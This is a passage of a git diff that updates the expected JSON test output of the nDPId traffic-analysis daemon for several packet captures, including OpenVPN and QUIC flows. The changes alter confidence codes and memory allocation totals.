00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","packets-captured":5086,"packets-processed":5086,"total-skipped-flows":0,"total-l4-payload-len":4349113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1491069155251} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5086/5086 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6028269 bytes -~~ total memory freed........: 6028269 bytes -~~ total allocations/frees...: 123208/123208 +~~ total memory allocated....: 6161903 bytes +~~ total memory freed........: 6161903 bytes +~~ total allocations/frees...: 125970/125970 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 695 chars diff --git a/test/results/openvpn.pcap.out b/test/results/openvpn.pcap.out index 014cf83b3..6a75f7cf9 100644 --- a/test/results/openvpn.pcap.out +++ b/test/results/openvpn.pcap.out @@ -4,22 +4,22 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467904946700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946700,"pkt":"hCYVLjtSAA6OGXEMCABFAAA8ANVAAEAGYbLAqAFNLmXn2ursAbu+lXueAAAAAKACchBbjAAAAgQFtAQCCAoADXtLAAAAAAEDAwE="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1467904946755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946755,"pkt":"AA6OGXEMhCYVLjtSCABFoAA8AABAADQGbecuZefawKgBTQG76uxsxVWWvpV7n6AScSBx2QAAAgQFtAQCCAoANCgCAA17SwEDAwE="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1467904946755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467904946755,"pkt":"hCYVLjtSAA6OGXEMCABFAAA0ANZAAEAGYbnAqAFNLmXn2ursAbu+lXufbMVVl4AQOQjYsgAAAQEICgANe1AANCgC"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":96,"packets-processed":95,"total-skipped-flows":0,"total-l4-payload-len":9094,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1470218591746} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470218591746,"flow_last_seen":1470218591746,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470218591746,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470218591746,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1470218591746,"pkt":"mAyC0zx8AAjKQoXqCABFAABG3rhAAEARTXXAqCsMizuXiaIjNXAAMosJOLAsz\/G18BdPwJFmbjsSS62jkXMxe5OXItH+Y74AAAABV6HBXwAAAAAA"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470218591941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1470218591941,"pkt":"AAjKQoXqmAyC0zx8CABFAABSYIhAADIR2ZmLO5eJwKgrDDVwoiMAPhWBQPd\/wu\/b4j9X3sTI1WVNByO\/jAvlQThWMnDPrhMAAAABV6HBXwEAAAAAsCzP8bXwF08AAAAA"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470218591942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470218591942,"pkt":"mAyC0zx8AAjKQoXqCABFAABO3uZAAEARTT\/AqCsMizuXiaIjNXAAOpZEKLAsz\/G18BdPyDdJemqNaU65YLasCHjnV9mH+DAAAAACV6HBXwEAAAAA93\/C79viP1c="} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":179,"packets-processed":178,"total-skipped-flows":0,"total-l4-payload-len":19167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1472334890224} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472334890224,"flow_last_seen":1472334890224,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1472334890224,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1472334890224,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1472334890224,"pkt":"mAyC0zx8MFLLbJwbCABFAABGe8pAAEARsF3AqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZfF5v2e87DGOeGNd7GPORrKCUl+wAAAABV8IMKgAAAAAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1472334892420,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1472334892420,"pkt":"mAyC0zx8MFLLbJwbCABFAABGfNNAAEARr1TAqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZptsOrY2Z8Me\/lrzRmp5vsU3x26QAAAACV8IMKgAAAAAA"} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1472334892467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1472334892467,"pkt":"MFLLbJwbmAyC0zx8CABFAABSgmRAADERuLeLO5eJwKgrEjVwNXAAPoh1QDWQheTdAi5E5ZNzw1yvtD56Ix7qRbnOSoCURYgAAAABV8IMLQEAAAAAZg7imqSQsFkAAAAA"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1472334890224,"flow_last_seen":1472334892467,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1472334892467,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":248,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1470218591746,"flow_last_seen":1470218600860,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1172,"flow_tot_l4_payload_len":10073,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1472334896789,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1472334890224,"flow_last_seen":1472334909465,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1245,"flow_tot_l4_payload_len":23132,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1472334909465,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1472334890224,"flow_last_seen":1472334892467,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1472334892467,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":248,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1470218591746,"flow_last_seen":1470218600860,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1172,"flow_tot_l4_payload_len":10073,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1472334896789,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1472334890224,"flow_last_seen":1472334909465,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1245,"flow_tot_l4_payload_len":23132,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1472334909465,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":298,"packets-processed":298,"total-skipped-flows":0,"total-l4-payload-len":42299,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1472334909465} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 298/298 @@ -29,9 +29,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882275 bytes -~~ total memory freed........: 5882275 bytes -~~ total allocations/frees...: 118422/118422 +~~ total memory allocated....: 6015909 bytes +~~ total memory freed........: 6015909 bytes +~~ total allocations/frees...: 121184/121184 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 826 chars diff --git a/test/results/oracle12.pcapng.out b/test/results/oracle12.pcapng.out index 202cbc7bc..0284cf60b 100644 --- a/test/results/oracle12.pcapng.out +++ b/test/results/oracle12.pcapng.out @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872071 bytes -~~ total memory freed........: 5872071 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6005705 bytes +~~ total memory freed........: 6005705 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 658 chars diff --git a/test/results/os_detected.pcapng.out b/test/results/os_detected.pcapng.out index 38fb5ee77..1e74b5b9d 100644 --- a/test/results/os_detected.pcapng.out +++ b/test/results/os_detected.pcapng.out @@ -2,8 +2,8 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1611427514609} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1611427514609,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1611427514609,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAZdFAAEAR\/ePAqAGACAgICJuNAbsE7AYLxP8AAB0Inw\/JO07eNjIIgxX\/XKNBIUIARMqZ8UiDvq\/ZLsUdz0scSMu9YDA5XC\/EJ\/VWdcKmIJjpSLXMxg05sWM0HmWuizvek0EXnlQzmUN9ovr2\/hk4L4+drmSHxo9NOB+GUfgxVDY8jS5sYut7pzwyS1v0Tzd0E1TyJIWDsBfvZlI4bbIIRlefQgOB0WdUqMEfHzxzcbGs6dNO+9vDaznNJ4dGUWqyjTrP1xrbA5ARI5dTVb4R+7D0v8orWpuNvxjoiVb36LCsfL0SbVo2GhqQoHke+Z\/B2D+0+r7INWQc1iHzAG+HeNlA1LtOtYyHAJVB+P59vqKsfmDTE8RgVpXe1x30lS+4YR7jaekw9qCyZHC0kKXvmsPCqZ\/9qa5gMMsfGTjnOTdcid5WA6CyHhSK2HTQW4GkzXHYPreaFIFRc0y9+aMq1Mfl97S1vnvDvIbG91Np67AM6LV1xuilkclYvUim1l1JoFQCUfe6m3PyP+gIQTFerpfrZHjXHVmed8ZubnloXre0\/Z3B2Oh1fmjBjrSNQGdC4YK\/DVld8Ug+FRG0kxgDMCgRJ2S9dOYEMkKgzq\/BKvgwUYmMidXS+F+tMJvoHQSzv3bhpGgehHuZOqNIC3d6Rty6h0nPb+BYsf5E1IpIcwzMB2CvZbT77jViKMoAt5RtufWUmoQ2qymcAa7AXbvCL5L7qI\/1oplTPNm0Ysi0JSUXXf61rlCNL1vc+XNbLSeTg2Vz2fPTbPH7hg\/8qinCri68WhuYiT\/rvuXkVqGxWKJq5b1oM\/AIky7+yMfObOfk9kQ3thgac0pRO1LAAwjECH\/XdGHuEsxIejknnknLjBpjmS+2c+909N0TGc\/NPsDPdaLmN10HnCVLaT1WmruOxWZDa3gV1s3K4IKU6NwqVeHNSYO5xx5HEC7tZU+y4E74cmfLayIxxbdgkahHRv9ATyXrtMLRAHqK8ZsoIIw0D9NAPBA355APW3UhJ\/Z9ZHxppKcR2\/OPN1KQqoIrhRGT9bUzB7Xkn\/VMWRYSTXTiaAYMcb8dRkENbKtVWSIk9LJFrE8pIXivmB2tWlt1t6y+TR30oU1\/NUX3jGhxE7t44s+NhGXfBpl2YQbF4zUhYeZAUzU9QbWzyGdZYarMNxVUgYeW9stlVHB0y\/otPwbX9mpoJ+Dy1FXdgrsIv1LAkh1\/3bdSFFfKVJUwX6EGqQRQU02j\/r+E7RZ0bE01QtNNSuMRMdJX2zJtopXBwZLz8h67datSO+I1wfoRzj4VUG35Q8hcFywG\/xq04McVVySWGNnMos9RmQkhysf\/lc3FuHHnMMA\/XcGqeB2biYiiwAKDCGuBCGTLrEYhV1yIzE4vEhvJvg325fJl3DNeUSuAwqKe9SjUjQtv+EVpEiYxaR6X90zwFDBlHdBDDCfh3iS1o2jSGLUvocncy0jQz8qak7nPw6oMW\/gU8WvBhkEaY\/b26hw+tYWakl5yNVwxnF\/7PKfJyyyPpmjSH2ycL45nydbEY1t1GYpcV+P7AunIs6enuyUp9NNdtbH\/d0RuYFGsVW1287YLi13LwF56RtlC\/tVGquwfxdqcbniCbYb8LvlGF6r32UjuoiuACdgmkrt6Wf7sAVkRHeYLY5bLkD+o6H+JIwDjoOA\/yI8iOw0QceAwvS35vC2IO56LiInTgA=="} -01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"user_agent":"Mozilla\/5.0 (Windows NT 5.2; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit\/531.21.10 (KHTML, like Gecko)","version":"TLSv1.3","alpn":"h3-29","ja3":"9addef84847d700f759746b237c405c8","tls_supported_versions":"TLSv1.3"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"user_agent":"Mozilla\/5.0 (Windows NT 5.2; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit\/531.21.10 (KHTML, like Gecko)","version":"TLSv1.3","alpn":"h3-29","ja3":"9addef84847d700f759746b237c405c8","tls_supported_versions":"TLSv1.3"}} 